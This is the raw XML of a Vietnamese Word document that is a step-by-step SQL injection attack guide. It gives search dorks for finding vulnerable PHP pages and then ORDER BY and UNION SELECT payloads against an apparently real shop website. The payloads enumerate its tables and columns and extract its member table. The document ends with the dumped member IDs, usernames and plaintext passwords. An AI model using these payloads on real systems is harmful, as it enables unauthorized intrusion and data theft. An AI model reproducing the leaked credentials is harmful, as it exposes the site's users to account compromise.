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EF628" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D964DE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CÁC BƯỚC TẤN CÔNG SỬ DỤNG LỆNH UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23763DCA" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00CD551D" w:rsidRDefault="00D964DE" w:rsidP="00D964DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD551D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CÔNG CỤ HỖ TRỢ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D3F89" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00D964DE" w:rsidRDefault="00D964DE" w:rsidP="00D964DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D964DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Add-0n hackBar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB1362" w14:textId="77777777" w:rsidR="00D964DE" w:rsidRPr="00D964DE" w:rsidRDefault="00D964DE" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49535B50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Kiểm tra lỗi sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE2D532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Tìm số cột mà câu truy vấn tạo ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22199D6E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Tìm cột chứa thông tin có thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB95CA0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Xem phiên bản của CSDL và ngôn ngữ lập trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212353E6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Xác định tên bảng chứa thông tin người quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63565600" w14:textId="77777777" w:rsidR="0076000E" w:rsidRP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Xác định tài khoản/mật khẩu của quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E27BA" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000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000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Truy cập vào phần giành cho quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6C95C" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6257B081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1. Tìm kiếm trang web bị lỗi SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B2CCA" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>url inurl:product_detail php?id= site vn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029218C1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</w:p>
    <w:p w14:paraId="39CC4FA6" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Các từ khóa khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E185B3C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index.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37710C07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news.php id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E72C82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article.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA32109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games.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26373DBF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opinions.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30489C62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pages.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA426D4" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>product_detail.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70727AF0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view.php?id=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E346FD" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14275737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- Web không bị lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4449A3D5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tainguyenxanh.vn/product_detail.php?id=13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F0DD3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- Web bi loi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6243A0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http://kentshop.com.vn/?frame=product_detail&amp;id=241</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C92125" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D098858" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA SỐ CỘT CỦA TABLE MÀ SQL TRUY VẤN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C07422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kentshop.com.vn/?frame=product_detail&amp;id=241 order by 17--</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33FFDD" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EB8E04" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA CỘT BỊ LỖI MÀ TA CÓ THỂ KHAI THÁC ĐƯỢC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3F9EF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kentshop.com.vn/?frame=product_detail&amp;id=- 241 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56880E6E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>KIỂM TRA MỘT SỐ THÔNG TIN CỦA DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E6C2D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Ve</w:t>
      </w:r>
      <w:r w:rsidR="000A385E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8C880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database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A209B48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ab/>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF20F9E" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E"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>LIỆT KÊ CÁC BẢNG TRONG</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E00FC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http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="0024166B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F887C32" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021149EF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">tbl_config,tbl_content,tbl_content_category,tbl_inchsize,tbl_manufacturer,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4DF90A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6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> LIỆT KÊ CÁC CỘT TRONG TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0657DCB7" w14:textId="24237EBE" w:rsid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http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="0024166B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5A98">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="003E5A98">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>=CHAR(116, 98, 108, 95, 109, 101, 109, 98, 101, 114)</w:t>
      </w:r>
      <w:r w:rsidR="00D4200B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="73BB080F" w14:textId="77777777" w:rsidR="008C22CA" w:rsidRDefault="008C22CA" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69310E66" w14:textId="77777777" w:rsidR="008C22CA" w:rsidRPr="0076000E" w:rsidRDefault="008C22CA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http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>116981089510910110998101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A024F13" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A05495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7.</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LẤY DỮ LIỆU TRONG BẢNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9B94F" w14:textId="77777777" w:rsidR="0076000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http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(id,0x</w:t>
      </w:r>
      <w:r w:rsidR="00D01A68">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2f,uid,0x2f</w:t>
      </w:r>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_member --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6FC18" w14:textId="77777777" w:rsidR="0076000E" w:rsidRDefault="00D01A68" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221E9E0" w14:textId="77777777" w:rsidR="00D01A68" w:rsidRPr="0076000E" w:rsidRDefault="00D01A68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t>http://kentshop.com.vn/?frame=product_detail&amp;id=-241 UNION SELECT 1,2,unhex(hex(group_concat(id,0x3a,uid,0x3a,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tbl_member --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A162951" w14:textId="77777777" w:rsidR="0076000E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3BD47A" w14:textId="77777777" w:rsidR="00F4741E" w:rsidRPr="0076000E" w:rsidRDefault="0076000E" w:rsidP="0076000E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076000E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>71:cngocpham:123456,72:quach ngoc bich:123456,54:cuong:123456,55:cuong1:123456,56:cuong2:123456,57:cuong4:123456,58:Hãy nhập "Tên đăng nhập" !:123456,59:Pham Ngoc Cuong A:123456,60:Dang:123456,61:admin:123456,62:cuong121:123456,63:cuongpham:123456,64:cuongpham1:123456,65:accacac:123456,66:bicha:12345,67:123456:123456,68:cuong11:cuong11,69:accacac9:accacac9,70:cuong0fgfd:cuong0fgfd,73:quach ngoc bich a:123456,74:quach ngoc bich b:123456,75:Phạm Ngọc Cường:123456,76:Phạm Ngọc Cường A:123456,77:Dang tran:123456,78:Pham Cuong:123456,79:sds5:123456,80:cuong demo:123456,81:dang:123456,82:Dken:123456,83:Tran dang:123456,84:Mr dang:123456,85:Dang tran minh:123456,86:cường a:123456,87:dang khoi:123456,88:fsdfdsfdsf:123456,89:Lưu Gia Huy:123456</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F4741E" w:rsidRPr="00760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58EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3288D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46F6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="292A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0E"/>
    <w:rsid w:val="000769C9"/>
    <w:rsid w:val="000A385E"/>
    <w:rsid w:val="002414BA"/>
    <w:rsid w:val="0024166B"/>
    <w:rsid w:val="002B0B93"/>
    <w:rsid w:val="003051E3"/>
    <w:rsid w:val="003E5A98"/>
    <w:rsid w:val="0076000E"/>
    <w:rsid w:val="008C22CA"/>
    <w:rsid w:val="00CD551D"/>
    <w:rsid w:val="00D01A68"/>
    <w:rsid w:val="00D4200B"/>
    <w:rsid w:val="00D964DE"/>
    <w:rsid w:val="00F4741E"/>
    <w:rsid w:val="00F8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4C62"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{004A5497-58E4-459B-AFB1-FFB833E3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0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A5D1-7A49-472C-87BA-CD890762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ế Bảo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy> </cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-14T04:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-25T17:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>